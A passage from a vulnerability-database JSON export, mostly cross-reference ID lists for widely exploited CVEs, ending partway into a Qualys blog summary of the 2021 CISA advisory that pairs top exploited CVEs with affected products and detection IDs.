"THREATPOST:EFE8A853C0EEF9ED023CC92349BE9410", "THREATPOST:F084C5D91E4F66092F5449922C34C4CE", "THREATPOST:F1065D29808C9165285986CCB6DEBB5A", "THREATPOST:F158248C80174DD4B29AE26B4B4139C0", "THREATPOST:F19F70E263B2C3D2A16C72D12F9884FC", "THREATPOST:F1E0D1BF5C51CAA730D94DB196D962D1", "THREATPOST:F261FA3F1DECA361A6DBC169065B1101", "THREATPOST:F28846A403C73C488A77B766A21BB3E5", "THREATPOST:F2BB55148C9EC48C94C05B4B2CBBBC1A", "THREATPOST:F514D796FE42C0629BD951D8664A2420", "THREATPOST:F60D403369A535076F39A474F74C925E", "THREATPOST:F61F8A6168C36EAB1584BC8044080B35", "THREATPOST:F68D705DC9A7663E4BF22574470F51D7", "THREATPOST:F701F7503777655BB413FCBEFB88C8DE", "THREATPOST:F73CA4042B0D13ED4A29DED46F90E099", "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B", "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "THREATPOST:F9CF34A304B5CA2189D5CEDA09C8B0CB", "THREATPOST:F9FEB3F0862AAD4CC618F9737F44FA7B", "THREATPOST:FADCF664C06E3747C40C200AE681FDF8", "THREATPOST:FAE0DDDC6420E9881C1D719E13B77095", "THREATPOST:FB6C6CE8F3B4AE6846C8AB866C36F024", "THREATPOST:FBDE9552D48B698542D65DEA64890566", "THREATPOST:FBF1F4B1FB26C8B1E95965E920F985EF", "THREATPOST:FCB99D1A395F7D2D1BFD9F698321FA04", "THREATPOST:FCF1B008BD9B10ADDA0703FDB9CBAA04", "THREATPOST:FD699B5CBB882E8FB3DDF3341B557D27", "THREATPOST:FEAE151B1861BE9EF40E606D5434AE00", "THREATPOST:FFB8302BEBD76DDACC5FD08D3FF8F883"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1FEAB54A2EB3929007298481113A7219", "TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03", "TRENDMICROBLOG:8A87E8F1BA63B9BB2E84C23288C44FDC", "TRENDMICROBLOG:E3C3B5620EF807FF799CC5A969324BF2"]}, {"type": "ubuntu", "idList": ["USN-4510-1", "USN-4510-2", "USN-4559-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-7600", "UB:CVE-2020-1472"]}, {"type": "veracode", "idList": ["VERACODE:27548"]}, {"type": "vmware", "idList": ["VMSA-2021-0010"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:115E09DAC149F2CA9466BA7550E0A5FE", "WALLARMLAB:1493380EEC54B493CC22B4FA116139BB", "WALLARMLAB:C5940EBF622709A929825B8B12592EF5"]}, {"type": "zdi", "idList": ["ZDI-19-181"]}, {"type": "zdt", "idList": ["1337DAY-ID-29022", "1337DAY-ID-29119", "1337DAY-ID-30171", "1337DAY-ID-30199", "1337DAY-ID-30200", "1337DAY-ID-30268", "1337DAY-ID-33794", "1337DAY-ID-33806", "1337DAY-ID-33824", "1337DAY-ID-33951", "1337DAY-ID-34553", "1337DAY-ID-35274", "1337DAY-ID-35944", "1337DAY-ID-36024", "1337DAY-ID-36262", "1337DAY-ID-36281", "1337DAY-ID-36564"]}]}, "score": {"value": -0.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "0daydb", "idList": ["0DAYDB:137B89027DF0ADFC87056CE176A77441", "0DAYDB:C94508071E81EBFE1BF46F3EF3E4EDD3", "0DAYDB:E60701732169ACBFC7A4C97688260000"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:09A31B56FFEA13FBA5985C1B2E66133B", "AKAMAIBLOG:30D20162B95C09229EEF2C09C5D98FCA", "AKAMAIBLOG:BB43372E19E8CF90A965E98130D0C070"]}, {"type": "almalinux", "idList": ["ALSA-2021:1647"]}, {"type": "amazon", "idList": ["ALAS-2021-1469", "ALAS2-2021-1585"]}, {"type": "archlinux", "idList": ["ASA-201804-1", "ASA-202009-17"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CWD-5388"]}, {"type": "attackerkb", "idList": ["AKB:30E011CE-C422-42D7-BC8C-EFFC7B3B11A3", "AKB:3374FB55-2A44-4607-A9C5-265E7DE9B936", "AKB:5D17BB38-86BB-4514-BF1D-39EB48FBE4F1", "AKB:75221F03-CFA1-478E-9777-568E523E3272", "AKB:7C5703D3-9E18-4F5C-A4D2-25E1F09B43CB", "AKB:AF37CD6E-8730-4AEF-8679-0413B491A107", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "AKB:B983621D-529B-4375-AA6C-0DB0FBBF9A94", "AKB:BD645B28-C99E-42EA-A606-832F4F534945", "AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6", "AKB:DF071775-CD3A-4643-9E29-3368BD93C00F"]}, {"type": "avleonov", "idList": ["AVLEONOV:101A90D5F21CD7ACE01781C2913D1B6D", "AVLEONOV:28E47C69DA4A069031694EB4C2C931BA", "AVLEONOV:93A5CCFA19B815AE15942F533FFD65C4"]}, {"type": "canvas", "idList": ["NETSCALER_TRAVERSAL_RCE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:19B4E04F8F1723A4F28FA7A8354698AF", "CARBONBLACK:91F55D2B8B2999589579EACB1542A3E9", "CARBONBLACK:A526657711947788A54505B0330C16A0", "CARBONBLACK:C9B38F7962606C41AA16ECBD4E48D712", "CARBONBLACK:E0EA1F343D1E082C73087FC784C141BD", "CARBONBLACK:F099654AA95F6498DB33414802DBA792"]}, {"type": "centos", "idList": ["CESA-2020:5439"]}, {"type": "cert", "idList": ["VU:421280", "VU:490028"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1565", "CPAI-2017-1009", "CPAI-2018-0192", "CPAI-2018-1697", "CPAI-2019-0392", "CPAI-2019-0860", "CPAI-2019-1653", "CPAI-2020-0872", "CPAI-2020-1095", "CPAI-2021-0099", "CPAI-2021-0100", "CPAI-2021-0107", "CPAI-2021-0376"]}, {"type": "cisa", "idList": ["CISA:134C272F26FB005321448C648224EB02", "CISA:177CDBFAB8460E0C0E46679B383C5C2F", "CISA:2B970469D89016F563E142BE209443D8", "CISA:433F588AAEF2DF2A0B46FE60687F19E0", "CISA:61F2653EF56231DB3AEC3A9E938133FE", "CISA:661993843C9F9A838ADA8B8B8B9412D1", "CISA:7E93687DEED7F2EA7EFAEBA997B30A5D", "CISA:7FB0A467C0EB89B6198A58418B43D50C", "CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC", "CISA:990FCFCEB1D9B60F5FAA47A1F537A3CB"]}, {"type": "citrix", "idList": ["CTX267027"]}, {"type": "cve", "idList": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11580", "CVE-2020-0787"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1325-1:E895C", "DEBIAN:DLA-2463-1:1381E", "DEBIAN:DSA-4156-1:C1814"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-7600"]}, {"type": "dsquare", "idList": ["E-638", "E-639"]}, {"type": "exploitdb", "idList": ["EDB-ID:43163", "EDB-ID:44448", "EDB-ID:44449", "EDB-ID:44482", "EDB-ID:49071"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:643750D6FF631053256ACECA930FF041"]}, {"type": "f5", "idList": ["F5:K22854260"]}, {"type": "fedora", "idList": ["FEDORA:17401605E206", "FEDORA:2C56E6076005", "FEDORA:38D8230C58CD", "FEDORA:3F234602D69C", "FEDORA:45D79604B015", "FEDORA:4A64830CFCDC", "FEDORA:4B26D6048172", "FEDORA:5C39A60311F1", "FEDORA:7595560DCBCA", "FEDORA:9DFEE60469B4", "FEDORA:9FC6E6070D50", "FEDORA:C2CB46042D4E", "FEDORA:D89B16076A01", "FEDORA:D8A0E3053060"]}, {"type": "fireeye", "idList": ["FIREEYE:78657FD52E5CBE87FE2D0019439691A0", "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394"]}, {"type": "freebsd", "idList": ["24ACE516-FAD7-11EA-8D8C-005056A311D1", "A9E466E8-4144-11E8-A292-00E04C1EA73D"]}, {"type": "gentoo", "idList": ["GLSA-202012-24"]}, {"type": "githubexploit", "idList": ["042AB58A-C86A-5A8B-AED3-2FF3624E97E3", "04BCA9BC-E3AD-5234-A5F0-7A1ED826F600", "06BAC40D-74DF-5994-909F-3A87FC3B76C8", "07DF268C-467E-54A3-B713-057BA19C72F7", "07E56BF6-A72B-5ACD-A2FF-818C48E4E132", "0829A67E-3C24-5D54-B681-A7F72848F524", "09DFDAA9-9EF6-513F-B464-D707B45D598A", "0A8A2E34-0577-5F13-BD78-B9E96A8AF008", "0B0F940B-BBCE-52B1-8A3F-6FF63D7BDA4E", "0CFAB531-412C-57A0-BD9E-EF072620C078", "12E44744-1AF0-523A-ACA2-593B4D33E014", "14BD2DBD-3A91-55FC-9836-14EF9ABF56CF", "18DD4D81-26F7-5D44-BAC2-BC6B7D65E198", "1AAD4FCC-D02C-52F0-ADA8-410D1B99297C", "1AB95B23-4916-5338-9CB0-28672888287F", "1F74FB7B-4F6B-51C6-9117-E7A9750D027D", "20466D13-6C5B-5326-9C8B-160E9BE37195", "2255B39F-1B91-56F4-A323-8704808620D3", "27F3F58D-9FEF-5F4F-91FB-0D93B481FBA4", "2849E613-8689-58E7-9C55-A0616B66C91A", "28D42B84-AB24-5FC6-ADE1-610374D67F21", "291B5382-1EED-522B-869C-C2AFDC4AB400", "2C33B9C6-636A-5907-8CD2-119F9B69B89B", "2D16FB2A-7A61-5E45-AAF8-1E090E0ADCC0", "2E71FF50-1B48-5A8E-9212-C4CF9399715C", "306622D1-6E5F-53BE-AE3D-A17E5DAC3F50", "37EBD8DB-50D9-5D1E-B6AB-31330A7C47C7", "38A11E23-686C-5C12-93FA-4A82D0E04202", "39093366-D071-5898-A67D-A99B956B6E73", "3AEA79E9-5CA7-5210-9CAC-5E34F8E0C418", "3BFD8B83-5790-508D-8B9C-58C171517BD0", "3F400483-1F7E-5BE5-8612-4D55D450D553", "4141B394-8FC2-5D74-B0A2-3A1F5DF6905E", "45A4CAC6-39DD-5F6D-B0C4-9688EF931746", "46FA259E-5429-580C-B1D5-D1F09EB90023", "498E3F5C-3DFB-5A3F-BFE8-BEB7339F0C2E", "49EC151F-12F0-59CF-960C-25BD54F46680", "4CB63A18-5D6F-57E3-8CD8-9110CF63E120", "50FA6373-CBCD-5EF5-B37D-0ECD621C6134", "5B025A0D-055E-552C-B1FB-287C6F191F8E", "5DD13827-3FCE-5166-806D-088441D41514", "5E80DB20-575C-537A-9B83-CCFCCB55E448", "607F0EF9-B234-570A-9E89-A73FBE248E6F", "62891769-2887-58A7-A603-BCD5E6A6D6F9", "62ED9EA6-B108-5F5A-B611-70CC6C705459", "63C36F7A-5F99-5A79-B99F-260360AC237F", "6787DC40-24C2-5626-B213-399038EFB0E9", "6FB0B63E-DE9A-5065-B577-ECA3ED5E9F4B", "7078ED42-959E-5242-BE9D-17F2F99C76A8", "721C46F4-C390-5D23-B358-3D4B22959428", "879CF3A7-ECBC-552A-A044-5E2724F63279", "87B06BBD-7ED2-5BD2-95E1-21EE66501505", "90B60B74-AD49-5C01-A3B3-78E2BEFBE8DE", "90DEDA40-245E-56EA-A2AF-D7D36E62AF50", "9304254B-557D-5DFE-AF8D-E21D0DF1FFDF", "939F3BE7-AF69-5351-BD56-12412FA184C5", "988A0BAB-669A-57AE-B432-564B2E378252", "9A29EBA1-E786-5DD5-B661-E0080DEEB613", "9C9BD402-511C-597D-9864-647131FE6647", "A24AC1AC-55EF-51D8-B696-32F369DCAB96", "A4F047D6-CD61-5E9D-86EF-FB824CE2625F", "ACE1EC69-37E6-58A5-8C0B-96212CDB38DF", "AEF449B8-DC3E-544A-A748-5A1C6F7EBA59", "B41082A1-4177-53E2-A74C-8ABA13AA3E86", "B7C1C535-3653-5D12-8922-4C6A5CCBD5F3", "BA280EB1-2FF9-52DA-8BA4-A276A1158DD8", "BBE1926E-1EC7-5657-8766-3CA8418F815C", "BEF7E47B-985F-56DE-AD21-DFEF507AAFE1", "C3AF7933-1DDE-58AB-BF32-75FEDB10C925", "C5B49BD0-D347-5AEB-A774-EE7BB35688E9", "C790841B-11B6-5497-B6DB-EF8A56DD8A0C", "C7CE5D12-A4E5-5FF2-9F07-CD5E84B4C02F", "C7F6FB3B-581D-53E1-A2BF-C935FE7B03C8", "CA1AFE75-C90A-5C21-92B0-FC1C0282B767", "CA7DF0EF-7032-54E3-B16E-D0845CE73845", "CF07CF32-0B8E-58E5-A410-8FA68D411ED0", "CF9EC818-A904-586C-9C19-3B4F04770FBD", "D178DAA4-01D0-50D0-A741-1C3C76A7D023", "D3C401E0-D013-59E2-8FFB-6BEF41DA3D1B", "DEC5B8BB-1933-54FF-890E-9C2720E9966E", "E3BF7E8E-58EA-5BC5-A6F4-401912FFB4BE", "E3D6A7AD-AC9C-55EB-A993-B78D05403B54", "E9F25671-2BEF-5E8B-A60A-55C6DD9DE820", "EAFD9DBC-1E36-570B-9F48-8C355BBFD8E6", "EE4C8DE4-3366-58B0-9494-7FD5B6F9D0EF", "F085F702-F1C3-5ACB-99BE-086DA182D98B", "F27B127B-57F0-5352-B92F-B6F921378CBB", "F3D87CA2-44D8-583C-AF7F-85AA53FB6CAD", "FACAC587-D738-561E-B976-3A97B6202667", "FB99D0AC-3747-583A-AE7D-EE0F4E626D66", "FC661572-B96B-5B2C-B12F-E8D279E189BF"]}, {"type": "hackerone", "idList": ["H1:1063256", "H1:1119224", "H1:1119228", "H1:632721"]}, {"type": "hivepro", "idList": ["HIVEPRO:0E3B824DCD3B82D06D8078A118E98B54"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20201105-01-NETLOGON"]}, {"type": "ibm", "idList": ["8190BE7075BCD3ECD99D09840619467A00B84599B985C4B2AB342389339984B1"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4416FB86A8069C419B8EAC9DBF52A644", "IMPERVABLOG:9DE0CE48F84BCF9764A6FA0372DB2AD1"]}, {"type": "kaspersky", "idList": ["KLA11139", "KLA11689", "KLA11692", "KLA11929", "KLA11931", "KLA12103"]}, {"type": "kitploit", "idList": ["KITPLOIT:5494076556436489947"]}, {"type": "krebs", "idList": ["KREBS:62E2D32C0ABD1C4B8EA91C60B425255B"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:78E91E28F51B0A15B6CA53FF8A9B480B", "MALWAREBYTES:7C9E5CAE3DDA4E673D38360AB2A5706B", "MALWAREBYTES:8AB104C08F6A4BE34498DA02C120E924"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/EXCHANGE_PROXYLOGON_COLLECTOR/", "MSF:AUXILIARY/SCANNER/HTTP/EXCHANGE_PROXYLOGON/", "MSF:EXPLOIT/UNIX/WEBAPP/DRUPAL_DRUPALGEDDON2", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/OFFICE_MS17_11882", "MSF:EXPLOIT/WINDOWS/HTTP/EXCHANGE_PROXYLOGON_RCE/", "MSF:EXPLOIT/WINDOWS/LOCAL/CVE_2020_0787_BITS_ARBITRARY_FILE_MOVE"]}, {"type": "mmpc", "idList": ["MMPC:D6D537E875C3CBD84822A868D24B31BA", "MMPC:FC03200E57A46D16A8CD1A5A0E647BB3"]}, {"type": "mscve", "idList": ["MS:CVE-2017-11882", "MS:CVE-2019-0604", "MS:CVE-2020-0787"]}, {"type": "mskb", "idList": ["KB2553204", "KB3162047", "KB4011262", "KB4011604", "KB4011618", "KB4462143"]}, {"type": "msrc", "idList": ["MSRC:5B84BD451283462DC81D4090EFE66280", "MSRC:96F2FB0D77EED0ABDED8EBD64AEBEA09", "MSRC:ED939F90BDE8D7A32031A750388B03C9"]}, {"type": "mssecure", "idList": ["MSSECURE:C3D318931D83D536C01D2307EBC0B3B0", "MSSECURE:D6D537E875C3CBD84822A868D24B31BA", "MSSECURE:FC03200E57A46D16A8CD1A5A0E647BB3"]}, {"type": "myhack58", "idList": ["MYHACK58:62201891024", "MYHACK58:62201994299"]}, {"type": "nessus", "idList": ["AL2_ALAS-2021-1585.NASL", "ALA_ALAS-2021-1469.NASL", "CENTOS_RHSA-2020-5439.NASL", "DEBIAN_DLA-1325.NASL", "DEBIAN_DLA-2463.NASL", "DEBIAN_DSA-4156.NASL", "EULEROS_SA-2021-1050.NASL", "EULEROS_SA-2021-1118.NASL", "EULEROS_SA-2021-1517.NASL", "EULEROS_SA-2021-1533.NASL", "EULEROS_SA-2021-1625.NASL", "EULEROS_SA-2021-1635.NASL", "FEDORA_2018-922CC2FBAA.NASL", "FREEBSD_PKG_24ACE516FAD711EA8D8C005056A311D1.NASL", "FREEBSD_PKG_A9E466E8414411E8A29200E04C1EA73D.NASL", "GENTOO_GLSA-202012-24.NASL", "NEWSTART_CGSL_NS-SA-2021-0024_SAMBA.NASL", "OPENSUSE-2020-1526.NASL", "ORACLELINUX_ELSA-2020-5439.NASL", "REDHAT-RHSA-2020-5439.NASL", "SL_20201215_SAMBA_ON_SL7_X.NASL", "SMB_NT_MS20_MAR_4538461.NASL", "SMB_NT_MS20_MAR_4540670.NASL", "SMB_NT_MS20_MAR_4540673.NASL", "SMB_NT_MS20_MAR_4540681.NASL", "SMB_NT_MS20_MAR_4540688.NASL", "SMB_NT_MS20_MAR_4540689.NASL", "SMB_NT_MS20_MAR_4540693.NASL", "SMB_NT_MS20_MAR_4541506.NASL", "SMB_NT_MS20_MAR_4541509.NASL", "SMB_NT_MS20_MAR_4541510.NASL", "SMB_NT_MS21_FEB_4601347.NASL", "SMB_NT_MS21_MAR_EXCHANGE_2010_OOB.NASL", "SUSE_SU-2020-2719-1.NASL", "SUSE_SU-2020-2720-1.NASL", "SUSE_SU-2020-2721-1.NASL", "SUSE_SU-2020-2722-1.NASL", "SUSE_SU-2020-2724-1.NASL", "SUSE_SU-2020-2730-1.NASL", "UBUNTU_USN-4510-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704156", "OPENVAS:1361412562310812083", "OPENVAS:1361412562310812148", "OPENVAS:1361412562310812202", "OPENVAS:1361412562310812209", "OPENVAS:1361412562310815788", "OPENVAS:1361412562310815789", "OPENVAS:1361412562310815790", "OPENVAS:1361412562310815791", "OPENVAS:1361412562310815792", "OPENVAS:1361412562310815793", "OPENVAS:1361412562310815796", "OPENVAS:1361412562310815797", "OPENVAS:1361412562310874382", "OPENVAS:1361412562310874383", "OPENVAS:1361412562310874421", "OPENVAS:1361412562310874422", "OPENVAS:1361412562310874428", "OPENVAS:1361412562310874456", "OPENVAS:1361412562310875500", "OPENVAS:1361412562310875534", "OPENVAS:1361412562310891325"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5439"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145226", "PACKETSTORM:147181", "PACKETSTORM:147182", "PACKETSTORM:147247", "PACKETSTORM:147392", "PACKETSTORM:158056", "PACKETSTORM:160127", "PACKETSTORM:161806", "PACKETSTORM:161846", "PACKETSTORM:161938", "PACKETSTORM:163810"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:8FD1C9A0D76A3084445136A0275847C0"]}, {"type": "ptsecurity", "idList": ["PT-2020-01"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:97274435F9F49556ED060635FD9081E2", "QUALYSBLOG:D57DEDE8164E21BF8EE0C81B50AAA328"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:3A2793FB5315EE3613661543700B783B", "RAPID7BLOG:49C18614AD01B6865616A65F734B9F71", "RAPID7BLOG:5586742AC0F1C66F56B3583482B0960A", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:5D8768D89A817B5475C9FEA3577FB0BC", "RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53", "RAPID7BLOG:C628D3D68DF3AE5A40A1F0C9DFA38860"]}, {"type": "redhat", "idList": ["RHSA-2021:3723"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-1472"]}, {"type": "saint", "idList": ["SAINT:192E33BC51A49F81EC3C52F0E8A72432", "SAINT:1AF7483E5B4DB373D9449DD910472EA5", "SAINT:420D07B85504086850EFAA31B8BCAEB5", "SAINT:C857C9B9FEF5E0F807DAAB797C3B2D87", "SAINT:E218D6FA073276BB012BADF2CCE50F0E"]}, {"type": "samba", "idList": ["SAMBA:CVE-2020-1472"]}, {"type": "securelist", "idList": ["SECURELIST:1670EF82924C5F24DC777CBD3BA4AE5E", "SECURELIST:375240F06A95008FE7F1C49E97EEC5AF", "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "SECURELIST:5F58A2B6A05CED1E343735029CE88CC2", "SECURELIST:652E2EF2009E38562770BCAC629BEA2E", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:847981DCB9E90C51F963EE1727E40915", "SECURELIST:9CEE13B3A189B3DBB187C6946786F480", "SECURELIST:A3CEAF1114E104F14254F7AF77D7D080", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1", "SECURELIST:F1FC61836DCAA7F1E27411092B208523"]}, {"type": "seebug", "idList": ["SSV:97207"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1513-1"]}, {"type": "symantec", "idList": ["SMNTC-111238"]}, {"type": "talosblog", "idList": ["TALOSBLOG:7F660B8BF6BF1461DC91FBA38C034D9A", "TALOSBLOG:809E263C085A7EC5D9424905C6E4ACA8", "TALOSBLOG:A654303FB4331FDBB91B999EC882BE7A", "TALOSBLOG:A69C35FFFCE6FA744216C7784C7D2148"]}, {"type": "thn", "idList": ["THN:71D3B9379166BDEEAEC59EE5E145C193", "THN:814DFC4A310E0C39823F3110B0457F8C", "THN:8D76D821D51DF9AAAAF1C9D1FA8CA0C5", "THN:8E5D44939B2B2FF0156F7FF2D4802857", "THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2", "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "THN:9DB02C3E080318D681A9B33C2EFA8B73", "THN:ABF9BC598B143E7226083FE7D2952CAE", "THN:B0F0C0035DAAFA1EC62F15464A80677E", "THN:BC8A83422D35DB5610358702FCB4D154", "THN:C21D17F1D92C12B031AB9C761BBD004A", "THN:C473C49BA4C68CD048FB1E0B4A2D04F4", "THN:CBEFDC179819629DFFC0C17341BFD3E8", "THN:E9454DED855ABE5718E4612A2A750A98", "THN:EB3F9784BB2A52721953F128D1B3EAEC", "THN:ED087560040A02BCB1F68DE406A7F577", "THN:F03064A70C65D9BD62A8F5898BA276D2", "THN:F4928090525451C50A1B016ED3B0650F", "THN:F53D18B9EB0F8CD70C9289288AC9E2E1", "THN:F8EDB5227B5DA0E4B49064C2972A193D", "THN:FA40708E1565483D14F9A31FC019FCE1"]}, {"type": "threatpost", "idList": ["THREATPOST:0234DE925A24BDFF85D569B0592C4E40", "THREATPOST:056C552B840B2C102A6A75A2087CA8A5", "THREATPOST:0A40F95A480060B254A1AA6FCF9504B2", "THREATPOST:153B5C59C5DB1F87B3DFE2D673FA0030", "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "THREATPOST:1A7A6E9FF0F2A41A6A83EBDE0038383C", "THREATPOST:26EDD0A7C1914DBF0CFE32B0877BE5A7", "THREATPOST:27150C099FB4771B9DED4F6372D27EB7", "THREATPOST:2CE017994C889322A1BF0C3F3521DFD7", "THREATPOST:2D47D18D36043D4DFBFAD7C64345410E", "THREATPOST:30D70449EF03FFC5099B5B141FA079E2", "THREATPOST:3D545239C6AE58821904FBF3069CB365", "THREATPOST:43B03902EBB289EABEA3B61E32BF7B7B", "THREATPOST:45A8572FB3BCE9303EDEE2A4783994E3", "THREATPOST:45F91A2DD716E93AA4DA0D9441E725C6", "THREATPOST:483C67752109A3C6AF1920AEA0F63B4C", "THREATPOST:49274446DFD14E2B0DF948DA83A07ECB", "THREATPOST:4A51D32AF6E154B536858044A8667E45", "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "THREATPOST:616358A88F9C1E69920585FDC717CF1F", "THREATPOST:63D2355B6EF0B975846E034876BC66DF", "THREATPOST:6456A6FCBD57F31DF6ECF8310230973D", "THREATPOST:742E793D712CB6B2F049DBEA5373016E", "THREATPOST:816C2C5C3414F66AD1638248B7321FA1", "THREATPOST:88071AD0B76A2548D98F733D0DD3FE1A", "THREATPOST:937A7A291D84404C800DF20ADBE20BC1", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:9B936E81D7DD33C962D98A85BAF3B7FE", "THREATPOST:A1A1E1AC8DB384C8FA2988F9A9121141", "THREATPOST:A47D83D4BBBE115E6424755328525B9D", "THREATPOST:A4C1190B664DAE144A62459611AC5F4A", "THREATPOST:A5FC4C5797CA53E30A3426AF0843BFFE", "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "THREATPOST:AB80E18E0D0B4D9D91D9BF01EFBE3AC6", "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:B4579714760429B9531FF0E79E44C578", "THREATPOST:B62AA49BBB410F8D7406ABE4E3C4C62F", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:B956AABD7A9591A8F25851E15000B618", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:BADA213290027D414693E838771F8645", "THREATPOST:BBAE8AE32C2E8EC0271BBA9D0498A825", "THREATPOST:BE68C6E4335F8D5EEAEFCE1E8553C4C8", "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "THREATPOST:CAA77BB0CF0093962ECDD09004546CA3", "THREATPOST:DC270F423257A4E0C44191BE365F25CB", "THREATPOST:E1CCA676B9815B84D887370ABFDEE020", "THREATPOST:EE5FF4DE95B4AED68C90DCB6444B6560", "THREATPOST:F2BB55148C9EC48C94C05B4B2CBBBC1A", "THREATPOST:F60D403369A535076F39A474F74C925E", "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B", "THREATPOST:FADCF664C06E3747C40C200AE681FDF8"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1FEAB54A2EB3929007298481113A7219", "TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03", "TRENDMICROBLOG:8A87E8F1BA63B9BB2E84C23288C44FDC"]}, {"type": "ubuntu", "idList": ["USN-4510-1", "USN-4510-2", "USN-4559-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-1472"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:115E09DAC149F2CA9466BA7550E0A5FE"]}, {"type": "zdi", "idList": ["ZDI-19-181"]}, {"type": "zdt", "idList": ["1337DAY-ID-29022", "1337DAY-ID-30171", "1337DAY-ID-30199", "1337DAY-ID-30200", "1337DAY-ID-30268", "1337DAY-ID-33951"]}]}, "exploitation": null, "vulnersScore": -0.3}, "_state": {"dependencies": 1660032824, "score": 1660035404}, "_internal": {"score_hash": "40159287f205248acec0499758c726d3"}}
{"qualysblog": [{"lastseen": "2021-08-02T20:34:35", "description": "On July 28, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [cybersecurity advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>) detailing the top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021. Organizations are advised to prioritize and apply patches or workarounds for these vulnerabilities as soon as possible.\n\nThe advisory states, \u201cIf an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential attackers (such as internet-facing systems).\u201d\n\nCISA released the advisory in conjunction with the Australian Cyber Security Centre (ACSC), the United Kingdom\u2019s National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI).\n\nThe CISA advisory is similar in scope to the October 2020 United States National Security Agency (NSA) [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) listing the top 25 known vulnerabilities being actively used by Chinese state-sponsored cyber actors [that security teams can detect and mitigate or remediate](<https://blog.qualys.com/product-tech/2020/10/22/nsa-alert-chinese-state-sponsored-actors-exploit-known-vulnerabilities>) in their infrastructure using Qualys VMDR.\n\n### Top Routinely Exploited Vulnerabilities\n\nHere is the list of top routinely exploited vulnerabilities in 2020 and 2021 along with affected products and associated Qualys VMDR QID(s) for each vulnerability.\n\n**CVE-IDs**| **Affected Products**| **Qualys Detections (QIDs)** \n---|---|--- \nCVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065| Microsoft Exchange| 50107, 50108 \nCVE-2021-22893, CVE-2021-22894, CVE-2021-22899, CVE-2021-22900| Pulse Secure| 38838 \nCVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104| Accellion| 38830 \nCVE-2021-21985| VMware| 730102, 216261, 216260, 216259 \nCVE-2018-13379, CVE-2020-12812, CVE-2019-5591| Fortinet| 43702, 43769, 43825 \nCVE-2019-19781| Citrix| 150273, 372305, 372685 \nCVE-2019-11510| Pulse| 38771 \nCVE-2018-13379| Fortinet| 43702 \nCVE-2020-5902| F5- Big IP| 38791, 373106 \nCVE-2020-15505| MobileIron| 13998 \nCVE-2017-11882| Microsoft| 110308 \nCVE-2019-11580| Atlassian| 13525 \nCVE-2018-7600| Drupal| 371954, 150218, 